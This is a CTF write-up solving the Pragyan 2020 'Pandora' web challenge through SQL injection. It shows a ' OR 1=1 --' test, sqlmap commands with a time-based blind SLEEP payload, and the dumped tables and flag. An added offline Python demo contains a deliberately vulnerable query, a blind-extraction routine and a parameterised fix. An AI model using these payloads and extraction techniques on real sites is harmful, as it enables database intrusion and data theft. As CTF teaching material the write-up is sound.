Pragyan 2020 - Pandora
Posted on Wed. 26 February 2020 in CTF
Solved by: 7%
First solvers: nguyendqn
Jake in Pandora needs to save the Naʼvi from the Human invasion. But he is not sure of the locations of the humans' army bases.
Help him find those locations so that he can take them down before they start their move.
link: http://ctf.pragyan.org:14000
We need to create an account with a username and password (admin123 here). Once logged in, the profile page tells you that you don't have any message.
A quick test with the NAME parameter of profile.php set to ' OR 1=1 --' shows every message instead of only ours. Great, we found a SQL injection. Let's try to get all the data with sqlmap.
Validate the injection
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10"
[...]
[11:49:19] [INFO] GET parameter 'NAME' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
[...]
GET parameter 'NAME' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 80 HTTP(s) requests:
---
Parameter: NAME (GET)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: success=welcome&NAME=admin123' AND (SELECT 5886 FROM (SELECT(SLEEP(5)))YUbz) AND 'iTBY'='iTBY
---
Dump database
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10" --dbs
[...]
[11:51:01] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[11:51:16] [INFO] retrieved: 2
[11:51:21] [INFO] adjusting time delay to 2 seconds due to good response times
information_schema
[11:53:55] [INFO] retrieved: capture_the_flag
available databases [2]:
[*] capture_the_flag
[*] information_schema
[...]
Dump tables
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10" -D capture_the_flag --tables
[...]
[11:58:26] [INFO] retrieved: pandoralocations
[12:00:44] [INFO] retrieved: pandoramsg
[12:01:25] [INFO] retrieved: pandorausers
Database: capture_the_flag
[3 tables]
+------------------+
| pandoralocations |
| pandoramsg |
| pandorausers |
+------------------+
Dump data
$ sqlmap -u "http://ctf.pragyan.org:14000/profile.php?success=welcome&NAME=admin123" --tamper=space2comment -p "NAME" --cookie="PHPSESSID=0b30b4ce5ebe911385e432ac76ef2e10" -D capture_the_flag -T pandoralocations --dump
[...]
Database: capture_the_flag
Table: pandoralocations
[3 entries]
+-------+----------------------------------------+-----------+
| base | latitude | longitude |
+-------+----------------------------------------+-----------+
| base1 | 10.0054 N | 45.0245E |
| base2 | p_ctf{4vengers_455emb1e_0ne_l45t_t1me} | 56.0245e |
| base3 | 45.9999 S | 66.04578W |
+-------+----------------------------------------+-----------+
YEAH! We finally got the flag: p_ctf{4vengers_455emb1e_0ne_l45t_t1me}
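As an added example, not code from the writeup or from the challenge, the script below reproduces the two things shown above in a form you can run offline: why ' OR 1=1 -- returns every row when the NAME value is pasted into the query text, and how a blind injection of the shape sqlmap used (admin123' AND (...) AND 'x'='x) recovers a table name one bit at a time, which is what sqlmap automated for --dbs, --tables and --dump. It uses Python's sqlite3 as a stand-in for the challenge's MySQL back end, so the rows, the column names and the table layout are constructed assumptions, and the oracle's signal is whether admin123's row comes back rather than a SLEEP() delay (the boolean channel is the same, only the waiting is gone). unicode(), substr() and sqlite_master are SQLite's; on MySQL the same logic uses ASCII(), SUBSTRING() and information_schema.tables.

```python
import sqlite3

# Constructed sample rows standing in for the challenge's pandoramsg table
# (the real schema is not shown in the writeup; column names are assumptions).
MESSAGES = [
    ("admin123", "You have no message."),
    ("jake", "Human army bases: see pandoralocations."),
    ("neytiri", "Meet at the Hometree."),
]


def make_db():
    """Build an in-memory SQLite database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE pandoramsg (name TEXT, msg TEXT)")
    conn.executemany("INSERT INTO pandoramsg VALUES (?, ?)", MESSAGES)
    return conn


def vulnerable_lookup(conn, name):
    """Assumed shape of the challenge's bug: NAME is pasted into the SQL text,
    so a quote in the value changes the query itself."""
    sql = f"SELECT name, msg FROM pandoramsg WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def safe_lookup(conn, name):
    """Fixed version: a bound parameter is always data, never SQL."""
    sql = "SELECT name, msg FROM pandoramsg WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


def make_oracle(conn):
    """Blind-injection oracle in the shape of sqlmap's payload from the writeup:
    admin123' AND (<condition>) AND 'x'='x
    Returns True when the injected condition is true. The challenge signalled
    this with a SLEEP() delay; here the signal is whether admin123's row comes
    back, the same one-bit channel without the waiting."""
    def oracle(condition):
        payload = f"admin123' AND ({condition}) AND 'x'='x"
        return len(vulnerable_lookup(conn, payload)) > 0
    return oracle


def extract_string(oracle, expr, max_len=64):
    """Recover the string value of the SQL expression `expr` through the oracle,
    the way sqlmap retrieves names and cells over a blind injection:
    bisect the length, then bisect the code point of every character.
    unicode()/substr() are SQLite's functions; MySQL uses ASCII()/SUBSTRING()."""
    lo, hi = 0, max_len
    while lo < hi:
        mid = (lo + hi) // 2
        if oracle(f"length(({expr})) > {mid}"):
            lo = mid + 1
        else:
            hi = mid
    length = lo

    chars = []
    for pos in range(1, length + 1):
        lo, hi = 0, 255
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"unicode(substr(({expr}), {pos}, 1)) > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        chars.append(chr(lo))
    return "".join(chars)


def first_table_name(conn):
    """Blindly read the first table name, the manual equivalent of --tables.
    sqlite_master is SQLite's catalog; on MySQL the target would be
    information_schema.tables."""
    query = "SELECT name FROM sqlite_master WHERE type='table' LIMIT 1"
    return extract_string(make_oracle(conn), query)


if __name__ == "__main__":
    db = make_db()
    print("normal lookup:   ", vulnerable_lookup(db, "admin123"))
    print("' OR 1=1 --      ", vulnerable_lookup(db, "' OR 1=1 --"))
    print("parameterised:   ", safe_lookup(db, "' OR 1=1 --"))
    print("blind table name:", first_table_name(db))
```

Each character costs about eight oracle queries, which is why sqlmap's run above took minutes and why it warned about network jitter: with a time-based oracle every bit is a multi-second wait, and a delayed packet flips a bit. The fix on the application side is the safe_lookup shape, a prepared statement with the username bound as a parameter, with no tamper-script tricks such as space2comment able to get around it.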